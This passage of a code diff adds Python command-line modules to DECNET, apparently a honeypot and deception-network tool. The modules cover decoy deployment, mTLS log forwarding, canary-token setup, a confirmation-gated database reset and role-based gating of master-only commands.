        without a second manual invocation. The forwarder survives agent
        restarts and crashes — if it dies on its own, restart it manually
        with `decnet forwarder --daemon …`. Pass --no-forwarder to skip.
        """
        from decnet.agent import server as _agent_server
        from decnet.env import DECNET_SWARM_MASTER_HOST, DECNET_AGENT_LOG_FILE
        from decnet.swarm import pki as _pki
        resolved_dir = _pathlib.Path(agent_dir) if agent_dir else _pki.DEFAULT_AGENT_DIR
        if daemon:
            log.info("agent daemonizing host=%s port=%d", host, port)
            _utils._daemonize()
        if not no_forwarder and DECNET_SWARM_MASTER_HOST:
            fw_argv = [
                _sys.executable, "-m", "decnet", "forwarder",
                "--master-host", DECNET_SWARM_MASTER_HOST,
                "--master-port", str(int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))),
                "--agent-dir", str(resolved_dir),
                "--log-file", str(DECNET_AGENT_LOG_FILE),
                "--daemon",
            ]
            try:
                pid = _utils._spawn_detached(fw_argv, _utils._pid_dir() / "forwarder.pid")
                log.info("agent auto-spawned forwarder pid=%d master=%s", pid, DECNET_SWARM_MASTER_HOST)
                console.print(f"[dim]Auto-spawned forwarder (pid {pid}) → {DECNET_SWARM_MASTER_HOST}.[/]")
            except Exception as e:  # noqa: BLE001
                log.warning("agent could not auto-spawn forwarder: %s", e)
                console.print(f"[yellow]forwarder auto-spawn skipped: {e}[/]")
        elif not no_forwarder:
            log.info("agent skipping forwarder auto-spawn (DECNET_SWARM_MASTER_HOST unset)")
        log.info("agent command invoked host=%s port=%d dir=%s", host, port, resolved_dir)
        console.print(f"[green]Starting DECNET worker agent on {host}:{port} (mTLS)...[/]")
        rc = _agent_server.run(host, port, agent_dir=resolved_dir)
        if rc != 0:
            raise typer.Exit(rc)
--- a/decnet/cli/api.py
+++ b/decnet/cli/api.py
@@ -0,0 +1,54 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import os
 import signal
 import subprocess  # nosec B404
 import sys
 import typer
 from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .gating import _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def api(
        port: int = typer.Option(DECNET_API_PORT, "--port", help="Port for the backend API"),
        host: str = typer.Option(DECNET_API_HOST, "--host", help="Host IP for the backend API"),
        log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Path to the DECNET log file to monitor"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        workers: int = typer.Option(1, "--workers", "-w", min=1, help="Number of uvicorn worker processes"),
    ) -> None:
        """Run the DECNET API and Web Dashboard in standalone mode."""
        _require_master_mode("api")
        if daemon:
            log.info("API daemonizing host=%s port=%d workers=%d", host, port, workers)
            _utils._daemonize()
        log.info("API command invoked host=%s port=%d workers=%d", host, port, workers)
        console.print(f"[green]Starting DECNET API on {host}:{port} (workers={workers})...[/]")
        _env: dict[str, str] = os.environ.copy()
        _env["DECNET_INGEST_LOG_FILE"] = str(log_file)
        _cmd = [sys.executable, "-m", "uvicorn", "decnet.web.api:app",
                "--host", host, "--port", str(port), "--workers", str(workers)]
        try:
            proc = subprocess.Popen(_cmd, env=_env, start_new_session=True)  # nosec B603 B404
            try:
                proc.wait()
            except KeyboardInterrupt:
                try:
                    os.killpg(proc.pid, signal.SIGTERM)
                    try:
                        proc.wait(timeout=10)
                    except subprocess.TimeoutExpired:
                        os.killpg(proc.pid, signal.SIGKILL)
                        proc.wait()
                except ProcessLookupError:
                    pass
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
--- a/decnet/cli/bus.py
+++ b/decnet/cli/bus.py
@@ -0,0 +1,46 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command(name="bus")
    def bus_cmd(
        socket_path: str = typer.Option(
            None, "--socket", "-s",
            help="UNIX socket path (defaults to DECNET_BUS_SOCKET env var, "
                 "then /run/decnet/bus.sock, then ~/.decnet/bus.sock).",
        ),
        group: str = typer.Option(
            "decnet", "--group", "-g",
            help="POSIX group to chown the socket to (falls back to process "
                 "group if the named group does not exist).",
        ),
        heartbeat: int = typer.Option(
            10, "--heartbeat", "-H",
            help="Seconds between system.bus.health heartbeat events.",
        ),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process."),
    ) -> None:
        """Run the DECNET ServiceBus worker (host-local UNIX-socket pub/sub)."""
        import asyncio
        from decnet.bus.factory import _default_socket_path
        from decnet.bus.worker import bus_worker
        resolved = socket_path or _default_socket_path()
        if daemon:
            log.info("bus daemonizing socket=%s", resolved)
            _utils._daemonize()
        log.info("bus starting socket=%s group=%s heartbeat=%ds", resolved, group, heartbeat)
        console.print(f"[bold cyan]Bus starting[/] (socket: {resolved}, heartbeat: {heartbeat}s)")
        try:
            asyncio.run(bus_worker(resolved, group=group, heartbeat_interval=heartbeat))
        except KeyboardInterrupt:
            console.print("\n[yellow]Bus stopped.[/]")
--- a/decnet/cli/canary.py
+++ b/decnet/cli/canary.py
@@ -0,0 +1,104 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
 Two entry points share this module:
 * ``decnet canary`` — runs the worker process. Mirrors the shape of
  :mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
  systemd unit so its argv must stay stable.
 * ``decnet canary-install-toolchain`` — provisions the Node side of
  the fingerprint-canary obfuscator. Idempotent; safe to call from
  the API service unit's ``ExecStartPre``.
 Not master-only — any host that hosts deckies can run its own
 canary worker (the bus events stay local; the webhook worker on
 each host fans them out to SIEMs independently per the design
 in ``development/let-s-move-to-the-enumerated-pike.md``).
 """
 from __future__ import annotations
 import shutil
 import subprocess  # nosec B404 — npm exec is the whole point of the toolchain installer
 from pathlib import Path
 import typer
 from . import utils as _utils
 from .utils import console, log
 _TOOLCHAIN_TIMEOUT_S = 180
 def register(app: typer.Typer) -> None:
    @app.command(name="canary")
    def canary_cmd(
        daemon: bool = typer.Option(
            False, "--daemon", "-d", help="Detach to background as a daemon process",
        ),
    ) -> None:
        """Run the canary HTTP + DNS callback receiver."""
        import asyncio
        from decnet.canary.worker import run
        if daemon:
            log.info("canary daemonizing")
            _utils._daemonize()
        log.info("canary starting")
        console.print("[bold cyan]Canary callback receiver starting[/]")
        try:
            asyncio.run(run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Canary worker stopped.[/]")
    @app.command(name="canary-install-toolchain")
    def canary_install_toolchain(
        npm_bin: str = typer.Option(
            "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
        ),
    ) -> None:
        """Install the Node-side toolchain used by fingerprint canaries.
        Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
        directory so the obfuscator's helper script can ``require()``
        ``javascript-obfuscator`` at mint time. Requires Node >= 18.
        Idempotent: re-running on an already-installed tree is fast
        (npm short-circuits when ``node_modules/`` is up-to-date).
        """
        import decnet.canary as _canary_pkg
        canary_dir = Path(_canary_pkg.__file__).resolve().parent
        if not (canary_dir / "package.json").is_file():
            console.print(
                f"[red]canary package.json not found under {canary_dir}; "
                "wheel may be missing the JS toolchain payload.[/]"
            )
            raise typer.Exit(code=2)
        if shutil.which(npm_bin) is None:
            console.print(
                f"[red]npm executable {npm_bin!r} not found on PATH. "
                "Install Node >= 18 and re-run.[/]"
            )
            raise typer.Exit(code=2)
        console.print(
            f"[cyan]installing canary toolchain[/] in {canary_dir}",
        )
        try:
            proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
                [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
                cwd=str(canary_dir),
                capture_output=True, text=True,
                timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
            )
        except subprocess.TimeoutExpired:
            console.print("[red]npm install timed out after 3 minutes[/]")
            raise typer.Exit(code=3) from None
        if proc.returncode != 0:
            console.print(
                f"[red]npm install failed rc={proc.returncode}[/]\n"
                f"{proc.stderr.strip()}"
            )
            raise typer.Exit(code=proc.returncode)
        console.print("[green]canary toolchain ready[/]")
--- a/decnet/cli/db.py
+++ b/decnet/cli/db.py
@@ -0,0 +1,142 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 from typing import Optional
 import typer
 from rich.table import Table
 from .utils import console, log
 def _decnet_tables() -> tuple[str, ...]:
    """Every DECNET-managed table, ordered child-first for DROP safety.
    Source is ``SQLModel.metadata.sorted_tables`` — the same registry that
    drives ``create_all`` — so adding a new model automatically enrolls
    its table in ``db-reset`` with no manual step. (Previous hardcoded
    list drifted multiple times; ``webhook_subscriptions`` /
    ``session_profile`` / ``smtp_targets`` all got missed.)
    ``sorted_tables`` returns parent-first (topological order that makes
    ``CREATE`` safe). For ``DROP`` we need the reverse: children first,
    so FK constraints drop before their parents. ``SET FOREIGN_KEY_CHECKS
    = 0`` below makes this order-insensitive for MySQL, but the reverse
    order keeps the code honest for any backend that doesn't support
    disabling the FK check.
    """
    from sqlmodel import SQLModel
    # Importing the models package registers every table on SQLModel.metadata.
    import decnet.web.db.models  # noqa: F401
    return tuple(
        t.name for t in reversed(SQLModel.metadata.sorted_tables)
    )
 async def _db_reset_mysql_async(dsn: str, mode: str, confirm: bool) -> None:
    """Inspect + (optionally) wipe a MySQL database.  Pulled out of the CLI
    wrapper so tests can drive it without spawning a Typer runner."""
    from urllib.parse import urlparse
    from sqlalchemy import text
    from sqlalchemy.ext.asyncio import create_async_engine
    db_name = urlparse(dsn).path.lstrip("/") or "(default)"
    engine = create_async_engine(dsn)
    tables = _decnet_tables()
    try:
        rows: dict[str, int] = {}
        async with engine.connect() as conn:
            for tbl in tables:
                try:
                    result = await conn.execute(text(f"SELECT COUNT(*) FROM `{tbl}`"))  # nosec B608
                    rows[tbl] = result.scalar() or 0
                except Exception:  # noqa: BLE001 — ProgrammingError for missing table varies by driver
                    rows[tbl] = -1
        summary = Table(title=f"DECNET MySQL reset — database `{db_name}` (mode={mode})")
        summary.add_column("Table", style="cyan")
        summary.add_column("Rows", justify="right")
        for tbl, count in rows.items():
            summary.add_row(tbl, "[dim]missing[/]" if count < 0 else f"{count:,}")
        console.print(summary)
        if not confirm:
            console.print(
                "[yellow]Dry-run only.  Re-run with [bold]--i-know-what-im-doing[/] "
                "to actually execute.[/]"
            )
            return
        async with engine.begin() as conn:
            await conn.execute(text("SET FOREIGN_KEY_CHECKS = 0"))
            for tbl in tables:
                if rows.get(tbl, -1) < 0:
                    continue
                if mode == "truncate":
                    await conn.execute(text(f"TRUNCATE TABLE `{tbl}`"))
                    console.print(f"[green]✓ TRUNCATE {tbl}[/]")
                else:
                    await conn.execute(text(f"DROP TABLE `{tbl}`"))
                    console.print(f"[green]✓ DROP TABLE {tbl}[/]")
            await conn.execute(text("SET FOREIGN_KEY_CHECKS = 1"))
        console.print(f"[bold green]Done. Database `{db_name}` reset ({mode}).[/]")
    finally:
        await engine.dispose()
 def register(app: typer.Typer) -> None:
    @app.command(name="db-reset")
    def db_reset(
        i_know: bool = typer.Option(
            False,
            "--i-know-what-im-doing",
            help="Required to actually execute. Without it, the command runs in dry-run mode.",
        ),
        mode: str = typer.Option(
            "truncate",
            "--mode",
            help="truncate (wipe rows, keep schema) | drop-tables (DROP TABLE for each DECNET table)",
        ),
        url: Optional[str] = typer.Option(
            None,
            "--url",
            help="Override DECNET_DB_URL for this invocation (e.g. when cleanup needs admin creds).",
        ),
    ) -> None:
        """Wipe the MySQL database used by the DECNET dashboard.
        Destructive. Runs dry by default — pass --i-know-what-im-doing to commit.
        Only supported against MySQL; refuses to operate on SQLite.
        """
        import asyncio
        import os
        if mode not in ("truncate", "drop-tables"):
            console.print(f"[red]Invalid --mode '{mode}'. Expected: truncate | drop-tables.[/]")
            raise typer.Exit(2)
        db_type = os.environ.get("DECNET_DB_TYPE", "sqlite").lower()
        if db_type != "mysql":
            console.print(
                f"[red]db-reset is MySQL-only (DECNET_DB_TYPE='{db_type}'). "
                f"For SQLite, just delete the decnet.db file.[/]"
            )
            raise typer.Exit(2)
        dsn = url or os.environ.get("DECNET_DB_URL")
        if not dsn:
            from decnet.web.db.mysql.database import build_mysql_url
            try:
                dsn = build_mysql_url()
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(2) from e
        log.info("db-reset invoked mode=%s confirm=%s", mode, i_know)
        try:
            asyncio.run(_db_reset_mysql_async(dsn, mode=mode, confirm=i_know))
        except Exception as e:  # noqa: BLE001
            console.print(f"[red]db-reset failed: {e}[/]")
            raise typer.Exit(1) from e
--- a/decnet/cli/deploy.py
+++ b/decnet/cli/deploy.py
@@ -0,0 +1,308 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 from typing import Optional
 import typer
 from rich.table import Table
 from decnet.archetypes import Archetype, get_archetype
 from decnet.config import DecnetConfig
 from decnet.distros import get_distro
 from decnet.env import DECNET_API_HOST, DECNET_INGEST_LOG_FILE
 from decnet.fleet import all_service_names, build_deckies, build_deckies_from_ini
 from decnet.ini_loader import load_ini
 from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
 from . import utils as _utils
 from .gating import _require_master_mode
 from .utils import console, log
 def _deploy_swarm(config: "DecnetConfig", *, dry_run: bool, no_cache: bool) -> None:
    """Shard deckies round-robin across enrolled workers and POST to swarmctl."""
    base = _utils._swarmctl_base_url(None)
    resp = _utils._http_request("GET", base + "/swarm/hosts?host_status=enrolled")
    enrolled = resp.json()
    resp2 = _utils._http_request("GET", base + "/swarm/hosts?host_status=active")
    active = resp2.json()
    workers = [*enrolled, *active]
    if not workers:
        console.print("[red]No enrolled workers — run `decnet swarm enroll ...` first.[/]")
        raise typer.Exit(1)
    assigned: list = []
    for idx, d in enumerate(config.deckies):
        target = workers[idx % len(workers)]
        assigned.append(d.model_copy(update={"host_uuid": target["uuid"]}))
    config = config.model_copy(update={"deckies": assigned})
    body = {"config": config.model_dump(mode="json"), "dry_run": dry_run, "no_cache": no_cache}
    console.print(f"[cyan]Dispatching {len(config.deckies)} deckies across {len(workers)} worker(s)...[/]")
    resp3 = _utils._http_request("POST", base + "/swarm/deploy", json_body=body, timeout=900.0)
    results = resp3.json().get("results", [])
    table = Table(title="SWARM deploy results")
    for col in ("worker", "host_uuid", "ok", "detail"):
        table.add_column(col)
    any_failed = False
    for r in results:
        ok = bool(r.get("ok"))
        if not ok:
            any_failed = True
        detail = r.get("detail")
        if isinstance(detail, dict):
            detail = detail.get("status") or "ok"
        table.add_row(
            str(r.get("host_name") or ""),
            str(r.get("host_uuid") or ""),
            "[green]yes[/]" if ok else "[red]no[/]",
            str(detail)[:80],
        )
    console.print(table)
    if any_failed:
        raise typer.Exit(1)
 def register(app: typer.Typer) -> None:
    @app.command()
    def deploy(
        mode: str = typer.Option("unihost", "--mode", "-m", help="Deployment mode: unihost | swarm"),
        deckies: Optional[int] = typer.Option(None, "--deckies", "-n", help="Number of deckies to deploy (required without --config)", min=1),
        interface: Optional[str] = typer.Option(None, "--interface", "-i", help="Host NIC (auto-detected if omitted)"),
        subnet: Optional[str] = typer.Option(None, "--subnet", help="LAN subnet CIDR (auto-detected if omitted)"),
        ip_start: Optional[str] = typer.Option(None, "--ip-start", help="First decky IP (auto if omitted)"),
        services: Optional[str] = typer.Option(None, "--services", help="Comma-separated services, e.g. ssh,smb,rdp"),
        randomize_services: bool = typer.Option(False, "--randomize-services", help="Assign random services to each decky"),
        distro: Optional[str] = typer.Option(None, "--distro", help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9"),
        randomize_distros: bool = typer.Option(False, "--randomize-distros", help="Assign a random distro to each decky"),
        log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Host path for the collector to write RFC 5424 logs (e.g. /var/log/decnet/decnet.log)"),
        archetype_name: Optional[str] = typer.Option(None, "--archetype", "-a", help="Machine archetype slug (e.g. linux-server, windows-workstation)"),
        mutate_interval: Optional[int] = typer.Option(30, "--mutate-interval", help="Automatically rotate services every N minutes"),
        dry_run: bool = typer.Option(False, "--dry-run", help="Generate compose file without starting containers"),
        no_cache: bool = typer.Option(False, "--no-cache", help="Force rebuild all images, ignoring Docker layer cache"),
        parallel: bool = typer.Option(False, "--parallel", help="Build all images concurrently (enables BuildKit, separates build from up)"),
        ipvlan: bool = typer.Option(False, "--ipvlan", help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)"),
        config_file: Optional[str] = typer.Option(None, "--config", "-c", help="Path to INI config file"),
        api: bool = typer.Option(False, "--api", help="Start the FastAPI backend to ingest and serve logs"),
        api_port: int = typer.Option(8000, "--api-port", help="Port for the backend API"),
        daemon: bool = typer.Option(False, "--daemon", help="Detach to background as a daemon process"),
    ) -> None:
        """Deploy deckies to the LAN."""
        import os
        import subprocess  # nosec B404
        import sys
        from pathlib import Path as _Path
        _require_master_mode("deploy")
        if daemon:
            log.info("deploy daemonizing mode=%s deckies=%s", mode, deckies)
            _utils._daemonize()
        log.info("deploy command invoked mode=%s deckies=%s dry_run=%s", mode, deckies, dry_run)
        if mode not in ("unihost", "swarm"):
            console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
            raise typer.Exit(1)
        if config_file:
            try:
                ini = load_ini(config_file)
            except FileNotFoundError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
            iface = interface or ini.interface or detect_interface()
            subnet_cidr = subnet or ini.subnet
            effective_gateway = ini.gateway
            if subnet_cidr is None:
                subnet_cidr, effective_gateway = detect_subnet(iface)
            elif effective_gateway is None:
                _, effective_gateway = detect_subnet(iface)
            host_ip = get_host_ip(iface)
            console.print(f"[dim]Config:[/] {config_file}  [dim]Interface:[/] {iface}  "
                          f"[dim]Subnet:[/] {subnet_cidr}  [dim]Gateway:[/] {effective_gateway}  "
                          f"[dim]Host IP:[/] {host_ip}")
            if ini.custom_services:
                from decnet.custom_service import CustomService
                from decnet.services.registry import register_custom_service
                for cs in ini.custom_services:
                    register_custom_service(
                        CustomService(
                            name=cs.name,
                            image=cs.image,
                            exec_cmd=cs.exec_cmd,
                            ports=cs.ports,
                        )
                    )
            effective_log_file = log_file
            try:
                decky_configs = build_deckies_from_ini(
                    ini, subnet_cidr, effective_gateway, host_ip, randomize_services, cli_mutate_interval=mutate_interval
                )
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
        else:
            if deckies is None:
                console.print("[red]--deckies is required when --config is not used.[/]")
                raise typer.Exit(1)
            services_list = [s.strip() for s in services.split(",")] if services else None
            if services_list:
                known = set(all_service_names())
                unknown = [s for s in services_list if s not in known]
                if unknown:
                    console.print(f"[red]Unknown service(s): {unknown}. Available: {all_service_names()}[/]")
                    raise typer.Exit(1)
            arch: Archetype | None = None
            if archetype_name:
                try:
                    arch = get_archetype(archetype_name)
                except ValueError as e:
                    console.print(f"[red]{e}[/]")
                    raise typer.Exit(1)
            if not services_list and not randomize_services and not arch:
                console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
                raise typer.Exit(1)
            iface = interface or detect_interface()
            if subnet is None:
                subnet_cidr, effective_gateway = detect_subnet(iface)
            else:
                subnet_cidr = subnet
                _, effective_gateway = detect_subnet(iface)
            host_ip = get_host_ip(iface)
            console.print(f"[dim]Interface:[/] {iface}  [dim]Subnet:[/] {subnet_cidr}  "
                          f"[dim]Gateway:[/] {effective_gateway}  [dim]Host IP:[/] {host_ip}")
            distros_list = [d.strip() for d in distro.split(",")] if distro else None
            if distros_list:
                try:
                    for slug in distros_list:
                        get_distro(slug)
                except ValueError as e:
                    console.print(f"[red]{e}[/]")
                    raise typer.Exit(1)
            ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
            decky_configs = build_deckies(
                deckies, ips, services_list, randomize_services,
                distros_explicit=distros_list, randomize_distros=randomize_distros,
                archetype=arch, mutate_interval=mutate_interval,
            )
            effective_log_file = log_file
        if api and not effective_log_file:
            effective_log_file = os.path.join(os.getcwd(), "decnet.log")
            console.print(f"[cyan]API mode enabled: defaulting log-file to {effective_log_file}[/]")
        config = DecnetConfig(
            mode=mode,
            interface=iface,
            subnet=subnet_cidr,
            gateway=effective_gateway,
            deckies=decky_configs,
            log_file=effective_log_file,
            ipvlan=ipvlan,
            mutate_interval=mutate_interval,
        )
        log.debug("deploy: config built deckies=%d interface=%s subnet=%s", len(config.deckies), config.interface, config.subnet)
        if mode == "swarm":
            _deploy_swarm(config, dry_run=dry_run, no_cache=no_cache)
            if dry_run:
                log.info("deploy: swarm dry-run complete, no workers dispatched")
            else:
                log.info("deploy: swarm deployment complete deckies=%d", len(config.deckies))
            return
        from decnet.engine import deploy as _deploy
        _deploy(config, dry_run=dry_run, no_cache=no_cache, parallel=parallel)
        if dry_run:
            log.info("deploy: dry-run complete, no containers started")
        else:
            log.info("deploy: deployment complete deckies=%d", len(config.deckies))
        if mutate_interval is not None and not dry_run:
            console.print(f"[green]Starting DECNET Mutator watcher in the background (interval: {mutate_interval}m)...[/]")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "mutate", "--watch"],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start mutator watcher.[/]")
        if effective_log_file and not dry_run and not api:
            _collector_err = _Path(effective_log_file).with_suffix(".collector.log")
            console.print(f"[bold cyan]Starting log collector[/] → {effective_log_file}")
            subprocess.Popen(  # nosec B603
                [sys.executable, "-m", "decnet.cli", "collect", "--log-file", str(effective_log_file)],
                stdin=subprocess.DEVNULL,
                stdout=open(_collector_err, "a"),
                stderr=subprocess.STDOUT,
                start_new_session=True,
            )
        if api and not dry_run:
            console.print(f"[green]Starting DECNET API on port {api_port}...[/]")
            _env: dict[str, str] = os.environ.copy()
            _env["DECNET_INGEST_LOG_FILE"] = str(effective_log_file or "")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "uvicorn", "decnet.web.api:app", "--host", DECNET_API_HOST, "--port", str(api_port)],
                    env=_env,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT
                )
                console.print(f"[dim]API running at http://{DECNET_API_HOST}:{api_port}[/]")
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-PROBER[/] (auto-discovers attackers from log stream)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "probe", "--daemon", "--log-file", str(effective_log_file)],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-PROBER.[/]")
        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-PROFILER[/] (builds attacker profiles from log stream)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "profiler", "--daemon"],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-PROFILER.[/]")
        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-SNIFFER[/] (passive network capture)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "sniffer", "--daemon", "--log-file", str(effective_log_file)],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-SNIFFER.[/]")
--- a/decnet/cli/forwarder.py
+++ b/decnet/cli/forwarder.py
@@ -0,0 +1,75 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import asyncio
 import pathlib
 import signal
 from typing import Optional
 import typer
 from decnet.env import DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    @app.command()
    def forwarder(
        master_host: Optional[str] = typer.Option(None, "--master-host", help="Master listener hostname/IP (default: $DECNET_SWARM_MASTER_HOST)"),
        master_port: int = typer.Option(6514, "--master-port", help="Master listener TCP port (RFC 5425 default 6514)"),
        log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Local RFC 5424 file to tail and forward"),
        agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker cert bundle dir (default: ~/.decnet/agent)"),
        state_db: Optional[str] = typer.Option(None, "--state-db", help="Forwarder offset SQLite path (default: <agent_dir>/forwarder.db)"),
        poll_interval: float = typer.Option(0.5, "--poll-interval", help="Seconds between log file stat checks"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the worker-side syslog-over-TLS forwarder (RFC 5425, mTLS to master:6514)."""
        from decnet.env import DECNET_SWARM_MASTER_HOST
        from decnet.swarm import pki
        from decnet.swarm.log_forwarder import ForwarderConfig, run_forwarder
        resolved_host = master_host or DECNET_SWARM_MASTER_HOST
        if not resolved_host:
            console.print("[red]--master-host is required (or set DECNET_SWARM_MASTER_HOST).[/]")
            raise typer.Exit(2)
        resolved_agent_dir = pathlib.Path(agent_dir) if agent_dir else pki.DEFAULT_AGENT_DIR
        if not (resolved_agent_dir / "worker.crt").exists():
            console.print(f"[red]No worker cert bundle at {resolved_agent_dir} — enroll from the master first.[/]")
            raise typer.Exit(2)
        if not log_file:
            console.print("[red]--log-file is required.[/]")
            raise typer.Exit(2)
        cfg = ForwarderConfig(
            log_path=pathlib.Path(log_file),
            master_host=resolved_host,
            master_port=master_port,
            agent_dir=resolved_agent_dir,
            state_db=pathlib.Path(state_db) if state_db else None,
        )
        if daemon:
            log.info("forwarder daemonizing master=%s:%d log=%s", resolved_host, master_port, log_file)
            _utils._daemonize()
        log.info("forwarder command invoked master=%s:%d log=%s", resolved_host, master_port, log_file)
        console.print(f"[green]Starting DECNET forwarder → {resolved_host}:{master_port} (mTLS)...[/]")
        async def _main() -> None:
            stop = asyncio.Event()
            loop = asyncio.get_running_loop()
            for sig in (signal.SIGTERM, signal.SIGINT):
                try:
                    loop.add_signal_handler(sig, stop.set)
                except (NotImplementedError, RuntimeError):  # pragma: no cover
                    pass
            await run_forwarder(cfg, poll_interval=poll_interval, stop_event=stop)
        try:
            asyncio.run(_main())
        except KeyboardInterrupt:
            pass
--- a/decnet/cli/gating.py
+++ b/decnet/cli/gating.py
@@ -0,0 +1,78 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Role-based CLI gating.
 MAINTAINERS: when you add a new Typer command (or add_typer group) that is
 master-only, register its name in MASTER_ONLY_COMMANDS / MASTER_ONLY_GROUPS
 below. The gate is the only thing that:
  (a) hides the command from `decnet --help` on worker hosts, and
  (b) prevents a misconfigured worker from invoking master-side logic.
 Forgetting to register a new command is a role-boundary bug. Grep for
 MASTER_ONLY when touching command registration.
 Worker-legitimate commands (NOT in these sets): agent, updater, forwarder,
 status, collect, probe, sniffer. Agents run deckies locally and should be
 able to inspect them + run the per-host microservices (collector streams
 container logs, prober characterizes attackers hitting this host, sniffer
 captures traffic). Mutator and Profiler stay master-only: the mutator
 orchestrates respawns across the swarm; the profiler rebuilds attacker
 profiles against the master DB (no per-host DB exists).
 """
 from __future__ import annotations
 import os
 import typer
 from .utils import console
 MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
    "api", "swarmctl", "deploy", "redeploy", "teardown",
    "mutate", "listener", "profiler",
    "services", "distros", "correlate", "archetypes", "web",
    "db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
    # `ttp` runs on agents — local SMTP decoys persist .eml files into the
    # agent's artifacts tree and the EmailLifter disk-reaches them in-process
    # (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
    "ttp-backfill",
 })
 MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
    {"swarm", "topology", "geoip", "realism"}
 )
 def _agent_mode_active() -> bool:
    """True when the host is configured as an agent AND master commands are
    disallowed (the default for agents). Workers overriding this explicitly
    set DECNET_DISALLOW_MASTER=false to opt into hybrid use."""
    mode = os.environ.get("DECNET_MODE", "master").lower()
    disallow = os.environ.get("DECNET_DISALLOW_MASTER", "true").lower() == "true"
    return mode == "agent" and disallow
 def _require_master_mode(command_name: str) -> None:
    """Defence-in-depth: called at the top of every master-only command body.
    The registration-time gate in _gate_commands_by_mode() already hides
    these commands from Typer's dispatch table, but this check protects
    against direct function imports (e.g. from tests or third-party tools)
    that would bypass Typer entirely."""
    if _agent_mode_active():
        console.print(
            f"[red]`decnet {command_name}` is a master-only command; this host "
            f"is configured as an agent (DECNET_MODE=agent).[/]"
        )
        raise typer.Exit(1)
 def _gate_commands_by_mode(_app: typer.Typer) -> None:
    if not _agent_mode_active():
        return
    _app.registered_commands = [
        c for c in _app.registered_commands
        if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
    ]
    _app.registered_groups = [
        g for g in _app.registered_groups
        if g.name not in MASTER_ONLY_GROUPS
    ]
--- a/decnet/cli/geoip.py
+++ b/decnet/cli/geoip.py
@@ -0,0 +1,60 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
